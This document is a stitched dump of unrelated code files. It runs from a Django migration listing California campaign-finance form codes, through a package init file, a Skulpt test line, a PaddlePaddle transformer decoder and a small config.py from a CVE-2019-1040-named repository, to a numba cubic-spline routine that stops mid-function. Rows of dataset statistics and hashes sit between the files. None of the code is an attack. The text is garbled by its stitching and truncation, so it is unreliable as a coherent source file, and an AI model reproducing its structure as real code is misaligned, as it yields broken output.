Expenditure Report): Part 3, Contributions > $100 Received'), ('F497P1', 'Form 497 (Late Contribution Report): Part 1, Contributions Received'), ('F497P2', 'Form 497 (Late Contribution Report): Part 2, Contributions Made'), ('F498-A', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part A, Late Payments Attributed To'), ('F498-R', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part R, Late Payments Received From'), ('F601P2A', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section A, Lobbyist Employers'), ('F601P2B', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section B, Subcontracted Clients'), ('F615P1', 'Form 615 (Lobbyist Report): Part 1, Activity Expenses Paid, Incurred, Arranged or Provided by the Lobbyist'), ('F615P2', 'Form 615 (Lobbyist Report): Part 2, Campaign Contributions Made or Delivered'), ('F625P2', 'Form 625 (Report of Lobbying Firm): Part 2, Payments Received in Connection with Lobbying Activity'), ('F625P3A', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section A, Activity Expenses'), ('F625P3B', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section B, Payments Made'), ('F625P4B', 'Form 625 (Report of Lobbying Firm): Part 4, Campaign Contributions Made'), ('S635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F635P3B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section B, Payments To Lobbying Firms'), ('F635P3C', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section C, Activity Expenses'), ('F635P4B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 4, Campaign Contributions Made'), ('F645P2A', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section A, Activity Expenses'), ('F645P3B', 'Form 645 (Report of Person Spending $5,000 or More): Part 3, Campaign Contributions Made'), ('S497', 'Form 497: Late Contribution Report'), ('S635C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('A', 'Schedule A of any form (e.g., Forms 401 or 460)'), ('A4', 'Schedule A of any form (e.g., Forms 401 or 460)'), ('A6', 'Schedule A of any form (e.g., Forms 401 or 460)'), ('B', 'Schedule B of any form (e.g., Forms 401 or 460)'), ('B1', 'Schedule B, Part 1 of Forms 401 or 460'), ('B2', 'Schedule B, Part 2 of Forms 401 or 460'), ('B3', 'Schedule B, Part 3 of Forms 401 or 460'), ('C', 'Schedule C of any form (e.g., Forms 401 or F460)'), ('COMMENTS', 'Possibly comments by FPPC for any form?'), ('CVR', 'Cover page for any form (e.g., Forms 460, 461 or 497)'), ('D', 'Schedule D of any form (e.g., Forms 401, 460 or 461)'), ('DEBTF', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule F, Accrued Expenses (Unpaid Bills)'), ('E', 'Schedule E of any form (e.g., Forms 460, 461 or 465)'), ('EXPNT', 'Expenditures outlined on any form (e.g. Form 460)'), ('F', 'Schedule F of any form (e.g., Form 460)'), ('G', 'Schedule G of any form (e.g., Form 460)'), ('H', 'Schedule H of any form (e.g., Form 460)'), ('H1', 'Schedule H, Part 1 of any form (e.g., Form 460)'), ('H2', 'Schedule H2, Part 2 of any form (e.g., Form 460)'), ('H3', 'Schedule H3, Part 3 of any form (e.g., Form 460)'), ('I', 'Schedule I of any form (e.g., Form 460)'), ('PT5', 'Part 5 of any form (e.g., Form 461'), ('RCPTB1', 'Schedule B, Part 1 of any form (e.g., Form 460'), ('RCPTC', 'Schedule C of any form (e.g., Form 460)'), ('RCPTI', 'Schedule I of any form (e.g., Form 460)'), ('SCH A', 'Schedule A of any form (e.g., Form 460)'), ('SF', 'Schedule F of any form (e.g., Form 460)'), ('SPLT', 'A memo that applies to multiple items?'), ('SMRY', 'Summary section of any form (e.g., Form 460)'), ('SUM', 'Summary section of any form (e.g., Form 460)'), ('SUMMARY', 'Summary section of any form (e.g., Form 460)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=90), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=16), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=13)], help_text='Name of the source filing form or schedule', max_length=8, verbose_name='form type'),
),
]
| 225.066277 | 8,088 | 0.692428 | 14,332 | 115,459 | 5.475788 | 0.071239 | 0.053976 | 0.073854 | 0.112387 | 0.898087 | 0.881446 | 0.860205 | 0.83997 | 0.826986 | 0.798672 | 0 | 0.058708 | 0.125447 | 115,459 | 512 | 8,089 | 225.505859 | 0.718505 | 0.000589 | 0 | 0.748515 | 1 | 0.09505 | 0.522715 | 0.058403 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007921 | 0 | 0.013861 | 0.00396 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
15ddfa928ce65ee15964a1b7abfe539d9c9f04bd | 406 | py | Python | synethesia/network/__init__.py | RunOrVeith/SyNEThesia | 0ef5de759b4bf74cb318fc5e6e9be64520b8faf5 | [
"MIT"
] | 19 | 2018-03-26T08:47:15.000Z | 2021-06-21T07:57:59.000Z | synethesia/network/__init__.py | RunOrVeith/SyNEThesia | 0ef5de759b4bf74cb318fc5e6e9be64520b8faf5 | [
"MIT"
] | null | null | null | synethesia/network/__init__.py | RunOrVeith/SyNEThesia | 0ef5de759b4bf74cb318fc5e6e9be64520b8faf5 | [
"MIT"
] | 3 | 2020-07-07T21:19:33.000Z | 2021-05-31T17:22:40.000Z | from synethesia.network.feature_creators import logfbank_features, fft_features
from synethesia.network.synethesia_model import SynethesiaModel
from synethesia.network.io.audio_chunk_loader import StaticSongLoader
from synethesia.network.io.live_viewer import LiveViewer, AudioRecorder
from synethesia.network.io.sampled_song import SampledSong
from synethesia.network.io.video_creator import VideoCreator
| 58 | 79 | 0.891626 | 51 | 406 | 6.921569 | 0.509804 | 0.23796 | 0.356941 | 0.260623 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064039 | 406 | 6 | 80 | 67.666667 | 0.928947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c649f0fa3babf02428f3a67a7be4ea08f00b3293 | 23 | py | Python | test/run/t141.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t141.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t141.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | print 1|2|3|4|5|6|0x80
| 11.5 | 22 | 0.652174 | 8 | 23 | 1.875 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0.086957 | 23 | 1 | 23 | 23 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
c64b912f384b65e5a3513c95dcb95be9abddab30 | 14,999 | py | Python | NLP/EMNLP2021-SgSum/src/models/decoder.py | zhangyimi/Research | 866f91d9774a38d205d6e9a3b1ee6293748261b3 | [
"Apache-2.0"
] | 1,319 | 2020-02-14T10:42:07.000Z | 2022-03-31T15:42:18.000Z | NLP/EMNLP2021-SgSum/src/models/decoder.py | green9989/Research | 94519a72e7936c77f62a31709634b72c09aabf74 | [
"Apache-2.0"
] | 192 | 2020-02-14T02:53:34.000Z | 2022-03-31T02:25:48.000Z | NLP/EMNLP2021-SgSum/src/models/decoder.py | green9989/Research | 94519a72e7936c77f62a31709634b72c09aabf74 | [
"Apache-2.0"
] | 720 | 2020-02-14T02:12:38.000Z | 2022-03-31T12:21:15.000Z | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transformer decoder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from models.attention import multi_head_attention, multi_head_hierarchical_attention
from models.neural_modules import positionwise_feed_forward, \
pre_process_layer, post_process_layer
def transformer_decoder_layer(dec_input,
enc_output,
slf_attn_bias,
dec_enc_attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
cache=None,
gather_idx=None,
param_initializer=None,
name=''):
"""
The layer to be stacked in decoder part.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_output: (batch_size, n_tokens, emb_dim)
:param slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_attn_bias: (batch_size, n_head, tgt_len, n_tokens)
"""
# (batch_size, tgt_len, emb_dim)
slf_attn_output = multi_head_attention(
queries=pre_process_layer(out=dec_input, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_slf_attn'),
keys=None,
values=None,
attn_bias=slf_attn_bias, # (batch_size, n_head, tgt_len, tgt_len)
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
param_initializer=param_initializer,
name=name + '_slf_attn')
# add dropout and residual connection
# (batch_size, tgt_len, emb_dim)
slf_attn_output = post_process_layer(
prev_out=dec_input,
out=slf_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_slf_attn')
# (batch_size, tgt_len, emb_dim)
context_attn_output = multi_head_attention(
queries=pre_process_layer(out=slf_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_context_attn'),
keys=enc_output, # (batch_size, n_tokens, emb_dim)
values=enc_output, # (batch_size, n_tokens, emb_dim)
attn_bias=dec_enc_attn_bias, # (batch_size, n_head, tgt_len, n_tokens)
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
static_kv=True,
param_initializer=param_initializer,
name=name + '_context_attn')
# add dropout and residual connection
context_attn_output = post_process_layer(
prev_out=slf_attn_output,
out=context_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_context_attn')
ffd_output = positionwise_feed_forward(
x=pre_process_layer(out=context_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid=d_inner_hid,
d_hid=d_model,
dropout_rate=relu_dropout,
hidden_act=hidden_act,
param_initializer=param_initializer,
name=name + '_ffn')
# add dropout and residual connection
dec_output = post_process_layer(
prev_out=context_attn_output,
out=ffd_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_ffn')
return dec_output # (batch_size, tgt_len, emb_dim)
def transformer_decoder(dec_input,
enc_output,
dec_slf_attn_bias,
dec_enc_attn_bias,
n_layer,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
caches=None,
gather_idx=None,
param_initializer=None,
name='transformer_decoder'):
"""
The decoder is composed of a stack of identical decoder_layer layers.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_output: (batch_size, n_tokens, emb_dim)
:param dec_slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_attn_bias: (batch_size, n_head, tgt_len, n_tokens)
"""
for i in range(n_layer):
# (batch_size, tgt_len, emb_dim)
dec_output = transformer_decoder_layer(
dec_input=dec_input,
enc_output=enc_output,
slf_attn_bias=dec_slf_attn_bias,
dec_enc_attn_bias=dec_enc_attn_bias,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
cache=None if caches is None else caches[i],
gather_idx=gather_idx,
param_initializer=param_initializer,
name=name + '_layer_' + str(i))
dec_input = dec_output
# add layer normalization
dec_output = pre_process_layer(out=dec_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return dec_output # (batch_size, tgt_len, emb_dim)
def graph_decoder_layer(dec_input,
enc_words_output,
enc_sents_output,
slf_attn_bias,
dec_enc_words_attn_bias,
dec_enc_sents_attn_bias,
graph_attn_bias,
pos_win,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
cache=None,
gather_idx=None,
param_initializer=None,
name=''):
"""
The layer to be stacked in decoder part.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_words_output: (batch_size, n_blocks, n_tokens, emb_dim)
:param enc_sents_output: (batch_size, n_blocks, emb_dim)
:param slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_words_attn_bias: (batch_size, n_blocks, n_head, tgt_len, n_tokens)
:param dec_enc_sents_attn_bias: (batch_size, n_head, tgt_len, n_blocks)
:param graph_attn_bias: (batch_size, n_head, n_blocks, n_blocks)
"""
# (batch_size, tgt_len, emb_dim)
slf_attn_output = multi_head_attention(
queries=pre_process_layer(out=dec_input, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_attn'),
keys=None,
values=None,
attn_bias=slf_attn_bias, # (batch_size, n_head, tgt_len, tgt_len)
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
name=name + '_attn')
# add dropout and residual connection
# (batch_size, tgt_len, emb_dim)
slf_attn_output = post_process_layer(
prev_out=dec_input,
out=slf_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_attn'
)
# (batch_size, tgt_len, emb_dim)
hier_attn_output = multi_head_hierarchical_attention(
queries=pre_process_layer(out=slf_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_hier_attn'),
keys_w=enc_words_output, # (batch_size, n_blocks, n_tokens, emb_dim)
values_w=enc_words_output, # (batch_size, n_blocks, n_tokens, emb_dim)
attn_bias_w=dec_enc_words_attn_bias, # (batch_size, n_blocks, n_head, tgt_len, n_tokens)
keys_s=enc_sents_output, # (batch_size, n_blocks, emb_dim)
values_s=enc_sents_output, # (batch_size, n_blocks, emb_dim)
attn_bias_s=dec_enc_sents_attn_bias, # (batch_size, n_head, tgt_len, n_blocks)
graph_attn_bias=graph_attn_bias, # (batch_size, n_head, n_blocks, n_blocks)
pos_win=pos_win,
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
cache=cache,
gather_idx=gather_idx,
name=name + '_hier_attn')
# add dropout and residual connection
hier_attn_output = post_process_layer(
prev_out=slf_attn_output,
out=hier_attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_hier_attn')
ffd_output = positionwise_feed_forward(
x=pre_process_layer(out=hier_attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid=d_inner_hid,
d_hid=d_model,
dropout_rate=relu_dropout,
hidden_act=hidden_act,
param_initializer=param_initializer,
name=name + '_ffn'
)
# add dropout and residual connection
dec_output = post_process_layer(
prev_out=hier_attn_output,
out=ffd_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_ffn'
)
return dec_output # (batch_size, tgt_len, emb_dim)
def graph_decoder(dec_input,
enc_words_output,
enc_sents_output,
dec_slf_attn_bias,
dec_enc_words_attn_bias,
dec_enc_sents_attn_bias,
graph_attn_bias,
pos_win,
n_layer,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
caches=None,
gather_idx=None,
param_initializer=None,
name='graph_decoder'):
"""
The decoder is composed of a stack of identical decoder_layer layers.
:param dec_input: (batch_size, tgt_len, emb_dim)
:param enc_words_output: (batch_size, n_blocks, n_tokens, emb_dim)
:param enc_sents_output: (batch_size, n_blocks, emb_dim)
:param dec_slf_attn_bias: (batch_size, n_head, tgt_len, tgt_len)
:param dec_enc_words_attn_bias: (batch_size, n_blocks, n_head, tgt_len, n_tokens)
:param dec_enc_sents_attn_bias: (batch_size, n_head, tgt_len, n_blocks)
:param graph_attn_bias: (batch_size, n_head, n_blocks, n_blocks)
:return:
"""
for i in range(n_layer):
# (batch_size, tgt_len, emb_dim)
dec_output = graph_decoder_layer(
dec_input=dec_input,
enc_words_output=enc_words_output,
enc_sents_output=enc_sents_output,
slf_attn_bias=dec_slf_attn_bias,
dec_enc_words_attn_bias=dec_enc_words_attn_bias,
dec_enc_sents_attn_bias=dec_enc_sents_attn_bias,
graph_attn_bias=graph_attn_bias,
pos_win=pos_win,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
cache=None if caches is None else caches[i],
gather_idx=gather_idx,
param_initializer=param_initializer,
name=name + '_layer_' + str(i)
)
dec_input = dec_output
# add layer normalization
dec_output = pre_process_layer(out=dec_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return dec_output # (batch_size, tgt_len, emb_dim)
| 39.575198 | 97 | 0.581505 | 1,739 | 14,999 | 4.553191 | 0.096032 | 0.048497 | 0.037888 | 0.038646 | 0.87661 | 0.868527 | 0.845289 | 0.827987 | 0.799823 | 0.799823 | 0 | 0.000826 | 0.35429 | 14,999 | 378 | 98 | 39.679894 | 0.816727 | 0.231282 | 0 | 0.783217 | 0 | 0 | 0.021639 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013986 | false | 0 | 0.017483 | 0 | 0.045455 | 0.003497 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d681e16fa043febb2664da5bc4d136cdc62cc71f | 183 | py | Python | config.py | cclauss/CVE-2019-1040 | 31da973754862bd5e5355e9a8f696d9c59f046b2 | [
"MIT"
] | 1 | 2019-06-14T16:16:12.000Z | 2019-06-14T16:16:12.000Z | config.py | x7iaob/CVE-2019-1040 | 31da973754862bd5e5355e9a8f696d9c59f046b2 | [
"MIT"
] | null | null | null | config.py | x7iaob/CVE-2019-1040 | 31da973754862bd5e5355e9a8f696d9c59f046b2 | [
"MIT"
] | 1 | 2019-10-15T08:12:04.000Z | 2019-10-15T08:12:04.000Z | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
class global_var:
getpriv = False
def set_priv(status):
global_var.getpriv = status
def get_priv():
return global_var.getpriv | 22.875 | 31 | 0.688525 | 27 | 183 | 4.481481 | 0.666667 | 0.223141 | 0.396694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006623 | 0.174863 | 183 | 8 | 32 | 22.875 | 0.794702 | 0.229508 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.166667 | 0.833333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d69e31d4ccd8d57bf16a5ff2d130a1225bf7ffca | 59,392 | py | Python | flare/mgp/cubic_splines_numba.py | aaronchen0316/flare | 47a2a89af635dfec6b41a873625ac2411da14ebb | [
"MIT"
] | 144 | 2019-04-03T21:23:31.000Z | 2022-03-27T09:09:24.000Z | flare/mgp/cubic_splines_numba.py | aaronchen0316/flare | 47a2a89af635dfec6b41a873625ac2411da14ebb | [
"MIT"
] | 217 | 2019-09-04T16:01:15.000Z | 2022-03-31T20:36:10.000Z | flare/mgp/cubic_splines_numba.py | aaronchen0316/flare | 47a2a89af635dfec6b41a873625ac2411da14ebb | [
"MIT"
] | 46 | 2019-04-26T03:19:29.000Z | 2022-03-22T08:14:58.000Z | from numba import njit
import numpy as np
from numpy import zeros, array
from math import floor
_Ad = array(
[
# t^3 t^2 t 1
[-1.0 / 6.0, 3.0 / 6.0, -3.0 / 6.0, 1.0 / 6.0],
[3.0 / 6.0, -6.0 / 6.0, 0.0 / 6.0, 4.0 / 6.0],
[-3.0 / 6.0, 3.0 / 6.0, 3.0 / 6.0, 1.0 / 6.0],
[1.0 / 6.0, 0.0 / 6.0, 0.0 / 6.0, 0.0 / 6.0],
]
)
_dAd = array(
[
[0.0, -0.5, 1.0, -0.5],
[0.0, 1.5, -2.0, 0.0],
[0.0, -1.5, 1.0, 0.5],
[0.0, 0.5, 0.0, 0.0],
]
)
_d2Ad = array(
[
[0.0, 0.0, -1.0, 1.0],
[0.0, 0.0, 3.0, -2.0],
[0.0, 0.0, -3.0, 1.0],
[0.0, 0.0, 1.0, 0.0],
]
)
# The dAd and d2Ad are computed from the code below
# _dAd = zeros((4, 4), dtype=np.double)
# for i in range(1, 4):
# Ad_i = _Ad[:, i - 1]
# _dAd[:, i] = (4 - i) * Ad_i
#
# _d2Ad = zeros((4, 4), dtype=np.double)
# for i in range(1, 4):
# dAd_i = _dAd[:, i - 1]
# _d2Ad[:, i] = (4 - i) * dAd_i
@njit(cache=True)
def vec_eval_cubic_spline_1(a, b, orders, coefs, points, out):
d = a.shape[0]
N = points.shape[0]
for n in range(N):
x0 = points[n, 0]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
out[n] = (
Phi0_0 * (coefs[i0 + 0])
+ Phi0_1 * (coefs[i0 + 1])
+ Phi0_2 * (coefs[i0 + 2])
+ Phi0_3 * (coefs[i0 + 3])
)
@njit(cache=True)
def vec_eval_cubic_spline_2(a, b, orders, coefs, points, out):
d = a.shape[0]
N = points.shape[0]
for n in range(N):
x0 = points[n, 0]
x1 = points[n, 1]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
M1 = orders[1]
start1 = a[1]
dinv1 = (orders[1] - 1.0) / (b[1] - a[1])
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
u1 = (x1 - start1) * dinv1
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
Phi1_0 = 0
Phi1_1 = 0
Phi1_2 = 0
Phi1_3 = 0
if t1 < 0:
Phi1_0 = _dAd[0, 3] * t1 + _Ad[0, 3]
Phi1_1 = _dAd[1, 3] * t1 + _Ad[1, 3]
Phi1_2 = _dAd[2, 3] * t1 + _Ad[2, 3]
Phi1_3 = _dAd[3, 3] * t1 + _Ad[3, 3]
elif t1 > 1:
